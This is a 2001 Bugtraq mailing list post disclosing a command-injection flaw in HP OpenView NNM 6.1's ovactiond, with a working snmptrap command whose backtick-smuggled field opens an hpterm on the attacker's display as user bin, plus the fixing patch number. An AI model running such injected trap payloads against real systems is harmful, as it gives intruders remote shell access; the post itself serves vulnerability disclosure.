Home page logo

bugtraq logo Bugtraq mailing list archives

HP Openview NNM6.1 ovactiond bin exploit
From: Milo van der Zee <milo.van.der.zee () ordina nl>
Date: 8 Jun 2001 06:12:07 -0000


HP Openview NNM6.1 and earlier running on unix 
have a problem with the suid bin executable 
ovactiond. It allows for starting of any program by just 
sending a trap or event to the station running the 

in the trapd.conf the following is defined by default 
OV_MgX_NNM_Generic .
0208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 
$10 1.3.[snip...]

by sending this trap:
snmptrap -v 1 <NNM host> . 6 60000208 0 1 s "" 2 s "" 3 
s "\`/usr/bin/X11/hpterm -display <your client 
display>\`" 4 s "" [snip...] 12 s ""

You get an hpterm on your client display running 
under user bin on the NNM server.

The reason is that NNM first completes the command 
under the EXEC and then starts that in a shell.

the patch to install is PHSS_23779 and is default in 
all newest patch releases of NNM. This patch checks 
for 'strange' characters in the input strings received 
through the event or trap.


PS: moderator, please inform me why you do/did not 
place this message...

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]